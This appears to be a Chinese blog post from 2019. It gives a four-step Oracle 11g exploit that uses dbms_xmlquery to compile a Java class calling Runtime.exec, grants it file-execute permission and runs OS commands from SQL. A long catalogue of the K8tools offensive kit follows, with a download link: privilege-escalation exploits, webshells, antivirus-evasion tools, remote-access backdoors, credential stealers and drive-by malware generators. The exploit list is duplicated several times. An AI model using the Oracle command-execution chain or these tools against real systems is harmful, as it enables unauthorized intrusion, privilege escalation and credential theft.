2019年4月

Oracle是11g版本的,使用OracleShell无法进行执行命令,然后用以下方法进行提权。

1.创建JAVA包

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

2.JAVA权限

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;

3.创建函数

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

4.执行命令

select LinxRUNCMD('whoami') from dual;

1.png

声明: 工具仅供安全研究或授权渗透,非法用途后果自负。
博客: https://www.cnblogs.com/k8gege
下载: https://github.com/k8gege/K8tools
密码: k8gege k8team K8team

PS: 不定期更新,文件比较大,可按需下载。
提权工具均可在远控cmd或WebShell下运行,大部份经过修改重新编译兼容性稳定性比网上要好

综合工具
[+] 综合工具 K8飞刀Final.rar
[+] K8data.mdb K8飞刀漏洞数据库20190402
[+] K8expList.txt K8飞刀漏洞利用列表

提权工具
[+] 提权工具 iislpe.exe IIS全版本提权(仅限IIS帐户、服务帐户)
[+] 提权工具 pr.exe pr有参版 pr0无参版(巴西烤肉:国内10年所说的PR或IIS6提权)
[+] 提权工具 k8uac_20181125[K8].rar 目前还支持全版本WIN7-Win10
[+] 提权工具 bypassUAC_Win7_10[K8team].rar 13还是15年?Win10打补丁失效
[+] 提权工具 bypassUACexe_0419[K8].rar 13年的吧 打补丁的WIN7好像不支持了
[+] 提权工具 Lpk提权_K8.rar DLLHijack
[+] 提权工具 Usp10提权_K8.rar DLLHijack
[+] 提权工具 MS11-046.exe
[+] 提权工具 MS11-080.exe
[+] 提权工具 MS14-068 EXP域内提权神器.rar
[+] 提权工具 MS15-010提权[K8team]_20150603.rar
[+] 提权工具 MS15-051提权 CVE-2015-1701_20150525[K8].rar
[+] 提权工具 MS15-077提权工具[K8].rar
[+] 提权工具 MS16-016提权EXP[K8].rar
[+] 提权工具 Windows Win32k.sys EPATHOBJ 0day Exploit 提权工具 [K8team].rar
[+] 提权工具 k8downexec.mof
[+] 提权工具 k8zzz.rar SMB溢出 支持执行自定义exe程序
[+] 提权工具 udf.dll MYSQL udf提权DLL
[+] 提权工具 ws2help提权_K8.rar
[+] 提权工具 卡巴6.0.2.614提权.exe
[+] 提权工具 小红伞 Avira avipbb.sys 提权Exploit_1024[K8].rar
[+] 提权工具 提权Admin2SystemRun_0419[K8].rar
[+] 提权工具 提权GetTrustedInstaller_0419[K8].rar
[+] 提权工具 降权System2AdminRun_0419[K8].rar
[+] 提权工具 无NET添加用户提权_20140511[K8].rar
[+] 提权工具 K8_VBS提权脚本免杀生成器.rar
[+] 进程注入 DLL注入进程工具过UAC
[+] 提权工具 NV显卡提权NVexploit.rar
[+] 提权工具 net2.0day.exe
[+] 提权工具 K8dllhijack.rar DLL却持测试工具
[+] 提权工具 Invoke-MS16-032.ps1
[+] Apache 2.2.1.4 mod_isapi exploit.rar

漏洞利用
[+] 漏洞利用 K8飞刀-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)
[+] 漏洞利用 K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)
[+] 漏洞利用 K8_JbossExp.exe Jboss Jmx-console exploit
[+] 漏洞利用 K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar
[+] 漏洞利用 CVE-2018-2628 Weblogic GetShell EXPLOIT
[+] 漏洞利用 ColdFusion 8 LFI EXP
[+] 漏洞利用 K8_TomcatExp_1124[K.8].rar
[+] 漏洞利用 WordPress 4.2 XSS 0day 20150429[K.8].rar
[+] 漏洞利用 k8_zabbix_exp_20160820[K.8].rar

漏洞利用
[+] 漏洞利用 K8飞刀-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)
[+] 漏洞利用 K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)
[+] 漏洞利用 K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar
[+] 漏洞利用 CVE-2018-2628 Weblogic GetShell EXPLOIT
[+] 漏洞利用 ColdFusion 8 LFI EXP
[+] 漏洞利用 K8_TomcatExp_1124[K.8].rar
[+] 漏洞利用 WordPress 4.2 XSS 0day 20150429[K.8].rar
[+] 漏洞利用 k8_zabbix_exp_20160820[K.8].rar

漏洞利用
[+] 漏洞利用 K8飞刀-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)
[+] 漏洞利用 K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)
[+] 漏洞利用 K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar
[+] 漏洞利用 CVE-2018-2628 Weblogic GetShell EXPLOIT
[+] 漏洞利用 ColdFusion 8 LFI EXP
[+] 漏洞利用 K8_TomcatExp_1124[K.8].rar
[+] 漏洞利用 WordPress 4.2 XSS 0day 20150429[K.8].rar
[+] 漏洞利用 k8_zabbix_exp_20160820[K.8].rar
[+] 漏洞利用 K8_Ecshop_Exploit
[+] 漏洞利用 Magento 1.7.0.2 漏洞EXP_20150624[K.8].rar
[+] 漏洞利用 K8COOKIE.rar Cookie注入工具
[+] 漏洞利用 Jboss_invoke_Exp_k8.rar MSF脚本
[+] 漏洞利用 DB_Owner_GetShell_K8.rar MSSQL DB权限拿SHELL工具

挂马工具
[+] 挂马工具 K8ARPTool.rar 内网ARP工具批量挂马
[+] 挂马工具 CHM网马生成器.exe
[+] 0day漏洞 K8飞刀内置5个0day漏洞利用(Word漏洞IE神洞WVSRAR)
[+] 0day漏洞 [视频]BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team.rar
[+] 0day漏洞 [视频]Hacking Team Flash 0day样本(Firefox IE)完美触发_20150707[K8].rar

漏洞环境
[+] 漏洞环境 K8-ASP注入漏洞环境.rar
[+] 漏洞环境 k8bbs(php+mysql)注入漏洞环境.rar
[+] 漏洞环境 K8 SQL强化练习工具V1.0_20190301[K8].rar
[+] 漏洞环境 K8迷你ASP服务器.exe 绿色一键启动

免杀工具
[+] 免杀工具 K8_SC_ENCODE(CS & Msf免杀工具).rar
[+] 测试工具 K8shellcodeLoader.exe Shellcode测试
[+] 免杀工具 K8随机免杀花指令生成器V2.0.exe
[+] 免杀工具 K8数字签名添加器.exe
[+] 捆绑工具 K8免杀系统自带捆绑器加强版V2.0.EXE

远控后门
[+] 远控后门 K8_Gh0st_Bin.rar 不免杀漏洞测试上线用
[+] 远控后门 TeamServer.exe CS中转Win版,无需Kali下生成cobaltstrike.store文件
[+] 远控后门 QQ远控 ClientKey 利用工具.rar 不免杀18年仍然可用19年未测估计也还行
[+] 远控后门 vncdoor.exe VNC后门可正反向
[+] 远控后门 k8_SSH_Manage.exe 渗透专用SSH(执行完后立即销毁会话,不像putty保存会话常暴露IP)
[+] 远控后门 sshcmd.exe 渗透专用SSH(执行完后立即销毁会话,同时清除连接IP,)
[+] 远控后门 K8手机远控电脑V1.1_20121020[K.8].rar
[+] 远控后门 JspShellExec CMD下JSP一句话连接工具
[+] 捆绑工具 K8_rarBind.rar RAR捆绑工具

嗅探工具
[+] 嗅探工具 K8getPC.py 内网存活主机探测(无需端口无视防火墙)

扫描工具
[+] 扫描插件 K8Cscan Moudle FtpScan.rar Ftp密码扫描插件
[+] 扫描插件 K8Cscan Moudle MysqlScan.rar Mysql密码扫描插件
[+] 扫描插件 K8Cscan Moudle OnlinePC.rar 存活主机扫描插件
[+] 扫描插件 K8Cscan Moudle WebBanner.rar WebBanner标题扫描插件
[+] 扫描插件 K8Cscan Moudle WmiScan.rar Wmi扫描Win系统密码插件
[+] 扫描工具 K8Cscan for SameWeb.rar C段旁站扫描工具
[+] 扫描工具 K8Cscan for SubDomain.rar 子域名扫描工具
[+] 扫描工具 K8Cscan 3.1.rar 高效内网渗透扫描工具
[+] 扫描工具 cping3.0.rar 大型内外网渗透扫描工具
[+] 扫描工具 K8_C段旁注工具6.0
[+] 扫描工具 s加强版.exe
[+] 扫描工具 K8openssl批量 Bat版.rar
[+] 扫描工具 K8破壳SMTP Bat版.rar
[+] 扫描工具 WPdetection.exe WordPress站点信息获取
[+] 扫描工具 K8-S2批量.rar Struts2批量工具
[+] 扫描工具 smbcheck.exe MS17-010漏洞检测,cping、cscan批量专用

数据库
[+] 脱库工具 K8mysqlCmd.rar Mysql数据库免驱连接工具
[+] 脱库工具 K8_mysql脱裤20170114(千万).php
[+] 脱库工具 K8Packwebshell.aspx 整站打包工具
[+] 脱库工具 K8outSQL.aspx MSSQL导库工具

加密解密
[+] K8飞刀里大量加密解密算法、编码解码、SQL注入、XSS等
[+] 嗅探工具 k8ftpsniffer.py FTP
[+] 密码破解 K8_DNN_Password_Decrypt_20161110.rar dotnetnuke密码解密工具
[+] 密码破解 Invoke-Mimikatz.ps1 Mimikatz 20181209
[+] 密码破解 mz.exe Mimikatz-2.1.1-20181209 X86 一键版
[+] 密码破解 mz64.exe Mimikatz-2.1.1-20181209 X64 一键版
[+] 密码破解 K8_FTP爆破PHP脚本20151010.rar 内网渗透用
[+] 密码破解 K8_Mysql爆破PHP脚本20151009.rar 内网渗透用
[+] 密码破解 K8_ipcscan 爆破IPC自动种马工具+教程.rar
[+] 密码破解 weblogic密码解密工具(exe & jar)
[+] 密码破解 K8fuckVNC.rar k8vncpwd.exe VNC密码解密工具
[+] 密码破解 K8getTeamViewPWD_20150705[K.8].rar
[+] 密码破解 K8正方密码解密工具_20150801[K.8].rar
[+] 密码破解 getBrowserPWD_1124[K.8].rar FirefoxGhrome 浏览器密码读取工具
[+] 密码破解 getvpnpwd.exe VPN、ADSL宽带帐密读取工具(仅限XP、2003)
[+] 密码破解 GetPassword_x64.rar GetPwd_K8.rar 一键获取明文
[+] 密码破解 K8_FuckOneShell 一句话密码爆破秒破10万
[+] 加密解密 K8Base32_Decode_20161110.rar
[+] 斛密工具 k8ungzip.exe GZIP 用于提取0day网马Powershell执行PAYLOAD
[+] 密码破解 K8FTP密码破解器V2.0_20190301[K8].rar
[+] 密码破解 K8Access数据库密码读取器_20190301[K8].rar
[+] 加密工具 K8_FileHideImg.exe 任意文件隐藏至图片工具

安全辅助
[+] 安全工具 K8木马病毒后门监视器V3.0.rar 捆绑后门木马释放路径、Shell上传路径查看
[+] 安全工具 K8进程拦截.rar (比方说访问网页浏览器调用外站EXE执行说明0day来了,而且可防止木马运行)
[+] 安全工具 K8驱动防止WebShell提权工具.rar (就是说无法通过WEBSHELL执行任意命令,就算有签名的EXE也不行)
[+] 辅助工具 K8注册表跳转.exe
[+] 转发代理 K8PortMap.exe

WebShell
[+] 转换工具 k8exe2bat.exe 任意文件转Bat工具(WebShell无法上传EXE解决方案)
[+] 上传工具 K8upload_1125[K8].rar 新型小马上传工具支持任意文件(内置aspphpjsp小马)
[+] 连接工具 K8一句话ASP木马客户端加强程序版.exe
[+] WebShell k8cmd.ascx
[+] WebShell k8cmd.pl
[+] WebShell k8cmd.py
[+] WebShell k8飞刀CMD.jsp
[+] WebShell K8飞刀A专用UA一句话木马.asp
[+] WebShell K8飞刀PHP-专用UA一句话木马.php
[+] WebShell K8飞刀专用UA一句话木马.asxp
[+] WebShell shellcode.aspx

硬件渗透
[+]BadUSB K8飞刀 内含有大量Teensy渗透功能脚本自行研究
[+]BadUSB Teensy 兼容所有Windows和Linux系统下载者.ino

其它工具
[+]教程录制 K8屏幕录像 高压缩率版_20190301[K8].rar
[+]系统美化 K8文件夹个性设置工具.exe
[+]系统美化 K8个性桌面右键菜单.exe
[+]搜索工具 K8吉他谱搜索工具_20190301[K8].rar
[+]系统美化 图标提取器.exe
[+]系统美化 k8cmd.exe
[+]辅助工具 K8侠盗猎车4外挂.exe
[+]辅助工具 K8迅雷、快车、旋风地址互换工具.exe

关于提权工具
提权工具均可在远控cmd或WebShell下运行,大部份经过修改重新编译兼容性稳定性比网上要好
至少不像别人那样单纯收集POC或转载个带后门的放出来,有些人说这些网上都有源码那你自行编译吧
先不说那些只弹CMD的POC,实战中你都有权限操作目标桌面?提个权要弹出CMD?然后在上面打指令?
最主要一点是你拿到权限一定有桌面?你的远控有远程桌面功能?你在虚拟机里提权还是去网吧提权?
弹CMD的POC,90%必须USER以上权限才可以使用,更别说服务用户下不能使用创建带窗体进程的API
说得更明白就是很多POC在webshell下特别是IIS用户网络服务根本无法运行,能运行也无法弹CMD窗体。

请输入图片描述

Netsparker是一个便于使用的Web应用漏洞扫描工具,可以爬行、攻击并识别各种Web应用中存在的漏洞。能识别的Web应用漏洞包括SQL注入、XSS(跨网站指令码)、命令注入、本地文件包含和任意文件读取、远程文件包含、框架注入、内部路径信息披露等。

不同于其它漏洞扫描工具,Netsparker具有相当低的误报率,因为Netsparker执行多次测试以确认任何被识别的漏洞。它还有一个JavaScript引擎,可以解析、执行并分析Web应用中使用的JavaScript和VBScript输出。因此,Netsparker能成功爬行并充分了解网站(使用不同的AJAX框架、自定义代码或知名的框架如jQuery)。

点击下载